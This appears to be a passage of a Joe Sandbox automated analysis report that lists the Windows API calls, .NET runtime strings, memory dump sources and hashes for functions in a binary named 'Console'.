                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000,?,7CAB6A82,-00000001), ref: 012165AE
                                                                                                                                                                                                                          • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000055,00000000,00000055,00000000,7CAB6A82,-00000001,7CAB6A82,?), ref: 0121666B
                                                                                                                                                                                                                          • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000055,00000000,00000055,00000000,7CAB6A82,-00000001,7CAB6A82,?), ref: 012166A8
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000,7CAB6A82,-00000001,7CAB6A82,?), ref: 01216736
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,7CAB6A82,-00000001,7CAB6A82,?), ref: 01216783
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000,7CAB6A82,-00000001,7CAB6A82,?), ref: 0121679E
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000,?,7CAB6A82,-00000001,7CAB6A82,?), ref: 01216801
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00000000,00000000,?,7CAB6A82,-00000001), ref: 01216901
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,00000001,00000000,00000000,?,7CAB6A82,-00000001), ref: 0121694F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalLeaveSection$FreeLibrarywcsncpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 728819610-0
                                                                                                                                                                                                                          • Opcode ID: d4bdece7f8cb406bc41e94c1412d3a89a448c733e03bf5f9edb610f950daf07b
                                                                                                                                                                                                                          • Instruction ID: 2a6753625e8c2b579fe8ded523bf84ad222234ac465fee8188bd8f11a6a4bc36
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4bdece7f8cb406bc41e94c1412d3a89a448c733e03bf5f9edb610f950daf07b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AE1AAB0A20247DFEB25CF68C8487AEBBF5FF24314F054119DE14A7299E7B59941CB90
                                                                                                                                                                                                                          Function 010DC5A0 Relevance: 13.6, APIs: 5, Strings: 4, Instructions: 145stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(gcServer,gcServer,00000000,00000000,00FC0000), ref: 010DC5C3
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(gcServer,gcConcurrent), ref: 010DC5F7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strcmp
                                                                                                                                                                                                                          • String ID: GCRetainVM$System.GC.Server$gcConcurrent$gcServer
                                                                                                                                                                                                                          • API String ID: 1004003707-3257568746
                                                                                                                                                                                                                          • Opcode ID: 112f74a647afeb1a54e6a59c2e8259108cdfdc77d7c71a18eedbb8e75f305e6f
                                                                                                                                                                                                                          • Instruction ID: 521931aa96926614a4fccefab80f7fd44c637927533efaf7d85fc6d6a991fb8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 112f74a647afeb1a54e6a59c2e8259108cdfdc77d7c71a18eedbb8e75f305e6f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D84136327002098FEB20DF69ED84BEEB7B4EF74211F4001AED94596191EB305A55DBA1
                                                                                                                                                                                                                          Function 012D9D30 Relevance: 13.6, APIs: 9, Instructions: 142fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000004,00000000,00000000,012DACC7,?,?), ref: 012D9D67
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 012D9D79
                                                                                                                                                                                                                          • GetOverlappedResult.KERNEL32(?,00000000,00000000,00000001), ref: 012D9D90
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000004,00000000,00000000), ref: 012D9DF3
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 012D9E02
                                                                                                                                                                                                                          • GetOverlappedResult.KERNEL32(FFFCB810,?,00000000,00000001), ref: 012D9E1E
                                                                                                                                                                                                                          • WriteFile.KERNEL32(FFFCB810,?,?,00000000,?), ref: 012D9E4A
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 012D9E59
                                                                                                                                                                                                                          • GetOverlappedResult.KERNEL32(FFFCB810,?,00000000,00000001), ref: 012D9E75
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorFileLastOverlappedResultWrite
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2326230619-0
                                                                                                                                                                                                                          • Opcode ID: 5bb737a94c085ebf832de37af7c47933ef9e773d06f7518d810b55724faaef78
                                                                                                                                                                                                                          • Instruction ID: ba339322257b77a20ec3e4af0b5e40b2a9bc57518503bb26d5452db311c9da7e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bb737a94c085ebf832de37af7c47933ef9e773d06f7518d810b55724faaef78
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C513A71A1011AAFDF11CFA8C884EEEBBF9EF48304F058055EA04E7261D771DA95DB91
                                                                                                                                                                                                                          Function 012D5760 Relevance: 12.7, APIs: 10, Instructions: 172memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?,00000000,?,012D4A5C,00000000), ref: 012D577C
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000008,00000000,?,00000000,?,012D4A5C,00000000), ref: 012D5794
                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,012D4A5C,00000000), ref: 012D57D9
                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(03BF0000,00000000,00000004,?,012D4A5C,00000000), ref: 012D57F1
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,012D4A5C,00000000), ref: 012D583F
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,012D4A5C,00000000), ref: 012D5853
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,012D4A5C,00000000), ref: 012D5874
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,012D4A5C,00000000), ref: 012D58F6
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                            • Part of subcall function 0122D020: CreateFileW.KERNEL32(00000000,40000000,00000080,00000000,?,?,00000000,?,00000000,00000000,00000000,7CAB6A82,00000000,00000000,00000000), ref: 0122D19C
                                                                                                                                                                                                                            • Part of subcall function 0122D020: GetLastError.KERNEL32(?,00000000,00000000,00000000,7CAB6A82,00000000,00000000,00000000), ref: 0122D1AA
                                                                                                                                                                                                                            • Part of subcall function 0122D020: SetLastError.KERNEL32(00000000), ref: 0122D2E0
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000001,?,00000002,00000080,?,?,?,012D4A5C,00000000), ref: 012D58CB
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,00000001,?,00000002,00000080,?,?,?,012D4A5C,00000000), ref: 012D5949
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$ErrorLastProcess$AllocByteCharMultiWidefree$AllocateCreateFilemalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4222695509-0
                                                                                                                                                                                                                          • Opcode ID: b1e14d6a7b5c481e79f879d4d7cc87e788583fddbc00431596651db005d89860
                                                                                                                                                                                                                          • Instruction ID: 5eb3601a2a2241d74d6c9cf7a1ac97bdc41ccc94ce176731caa7886a12395fff
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1e14d6a7b5c481e79f879d4d7cc87e788583fddbc00431596651db005d89860
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8651D371710312EFEB219FA9DC45B6A7BA4EF44721F114179EA49DB3A0EBB09850CB90
                                                                                                                                                                                                                          Function 0124FAF0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 263COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WaitForMultipleObjectsEx.KERNEL32(00000003,?,00000000,?,00000000), ref: 0124FBCD
                                                                                                                                                                                                                          • SetEvent.KERNEL32(00000200,?,00000000,?,00000000), ref: 0124FC06
                                                                                                                                                                                                                            • Part of subcall function 01236A30: SleepEx.KERNEL32(000000FF,00000000,?,00000000,?,?,01242973,?,?,?,03C176F0), ref: 01236A4C
                                                                                                                                                                                                                            • Part of subcall function 01236A30: SleepEx.KERNEL32(000000FF,00000000,?,00000000,?,?,01242973,?,?,?,03C176F0), ref: 01236A6C
                                                                                                                                                                                                                            • Part of subcall function 01236720: LeaveCriticalSection.KERNEL32(03C17714,?,03C176F0,0124FE08), ref: 01236731
                                                                                                                                                                                                                            • Part of subcall function 01236720: SleepEx.KERNEL32(000000FF,00000000,0124FE08), ref: 01236779
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • DRCT::ML:: wait set empty after sweep., xrefs: 0124FD5F
                                                                                                                                                                                                                          • DRCT::THTML:: Doing helper thread duty, running main loop., xrefs: 0124FEB0
                                                                                                                                                                                                                          • DRCT::ML:: threads still syncing after sweep., xrefs: 0124FD88
                                                                                                                                                                                                                          • DRCT::ML:: Exiting., xrefs: 0124FDE7
                                                                                                                                                                                                                          • DRCT::THTML:: Exiting., xrefs: 0124FFCA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Sleep$CriticalEventLeaveMultipleObjectsSectionWait
                                                                                                                                                                                                                          • String ID: DRCT::ML:: Exiting.$DRCT::ML:: threads still syncing after sweep.$DRCT::ML:: wait set empty after sweep.$DRCT::THTML:: Doing helper thread duty, running main loop.$DRCT::THTML:: Exiting.
                                                                                                                                                                                                                          • API String ID: 568098540-3202962050
                                                                                                                                                                                                                          • Opcode ID: 7a00f5753f2d1614c0a73009f965dda9eb73ec0c050030364aaac6e4f0913709
                                                                                                                                                                                                                          • Instruction ID: 8f631a26aa54dc31fdae910a4542f50a1e727202425b14fa8dfed478f01c068b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a00f5753f2d1614c0a73009f965dda9eb73ec0c050030364aaac6e4f0913709
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3EA1B170E10245DBEF29DFACCA88BAEBBB5EF44310F144159DA51AB3C1D7759940CB50
                                                                                                                                                                                                                          Function 010F7BF0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 226threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00650072,03C176F0,?,7CAB6A82), ref: 0115DBCE
                                                                                                                                                                                                                          • SleepEx.KERNEL32(00000001,00000000), ref: 0115DDC5
                                                                                                                                                                                                                          • SwitchToThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,014DD6C5,000000FF,?,0115F6C7,03C16300), ref: 0115DDCB
                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,7CAB6A82), ref: 0115DE03
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • RareEnablePreemptiveGC: entering. Thread state = %x, xrefs: 0115DFD6
                                                                                                                                                                                                                          • RareDisablePreemptiveGC: entering. Thread state = %x, xrefs: 0115DC68
                                                                                                                                                                                                                          • RareEnablePreemptiveGC: leaving., xrefs: 0115E05A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$SleepSwitchThread
                                                                                                                                                                                                                          • String ID: RareDisablePreemptiveGC: entering. Thread state = %x$RareEnablePreemptiveGC: entering. Thread state = %x$RareEnablePreemptiveGC: leaving.
                                                                                                                                                                                                                          • API String ID: 490134931-775955930
                                                                                                                                                                                                                          • Opcode ID: 5b30efe5a679155bde85b30f694457398125b9c3c6e60fb19be41f9c71bee38f
                                                                                                                                                                                                                          • Instruction ID: 8b24cb2f7add136ead9570ce46da407cf90f336f1281011b465b7715217ac96c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b30efe5a679155bde85b30f694457398125b9c3c6e60fb19be41f9c71bee38f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C81E330700201DBEFA9DF6CEC94B6A7BA5AF41704F08809CED655B2D6CB75A851CBA1
                                                                                                                                                                                                                          Function 010D4020 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 224memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000002, at,00000005,00000004,00000000,00000000,?), ref: 010D40E1
                                                                                                                                                                                                                            • Part of subcall function 01223C50: HeapFree.KERNEL32(00000000,?,?,?), ref: 01223D68
                                                                                                                                                                                                                            • Part of subcall function 010D3E00: HeapFree.KERNEL32(00000000,?), ref: 010D3F34
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 010D4185
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,0159BF18,?, ,00000000,?), ref: 010D4202
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,00000000,010D3D80,?,00000109,00000000,?,0159BF18,?, ,00000000,?), ref: 010D4291
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,010D3D80,?,00000109,00000000,?,0159BF18), ref: 010D42C9
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$wcscpy_s
                                                                                                                                                                                                                          • String ID: $ at
                                                                                                                                                                                                                          • API String ID: 1983039323-3158221822
                                                                                                                                                                                                                          • Opcode ID: 1986004a59ac1a7457556bbf4f2a559515352afa8628c49203e7791009d4372a
                                                                                                                                                                                                                          • Instruction ID: ca95649babc3c28589306737e7d38fccf8d14934c5a90374ad5f8bd608711df9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1986004a59ac1a7457556bbf4f2a559515352afa8628c49203e7791009d4372a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A89198B4E00308EBEB25CFA9DD85BEDBBB5BF54314F144219E850BB6A0DB746905CB81
                                                                                                                                                                                                                          Function 012CD2B0 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 214libraryloadermemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000000,00000000,00000000,?,?), ref: 012CD3C9
                                                                                                                                                                                                                            • Part of subcall function 012CDF00: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,Microsoft-DotNETCore-SampleProfiler,00000000,?,?,?,?,?,?,012CDA55,?,?,7CAB6A82,?,00000000), ref: 012CDF22
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,timeBeginPeriod), ref: 012CD4B9
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(timeEndPeriod), ref: 012CD4CF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressProc$FreeHeapstrcmp
                                                                                                                                                                                                                          • String ID: Microsoft-DotNETCore-SampleProfiler$timeBeginPeriod$timeEndPeriod$winmm.dll
                                                                                                                                                                                                                          • API String ID: 974609388-753872048
                                                                                                                                                                                                                          • Opcode ID: bbbaf6b67b13d83cdd703679ff3b3ad04854f4ed959a79a21a5d6341d4662749
                                                                                                                                                                                                                          • Instruction ID: a25a27e0f617ca4e22571df16f45a6b3ada23e573254b1714dc30106fe72a14d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbbaf6b67b13d83cdd703679ff3b3ad04854f4ed959a79a21a5d6341d4662749
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2271D734610306AFDB24DF68EC81B6A77E2FF94B51F14422DEB069B694DB71D810CB90
                                                                                                                                                                                                                          Function 010255C0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 180libraryloadermemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000002,03C1ABF8,03C1ABF6,00000004,00000000,7CAB6A82,00000000,00000000), ref: 010256C0
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,7CAB6A82,00000000,00000000), ref: 0102578B
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,7CAB6A82,00000000,00000000), ref: 01025795
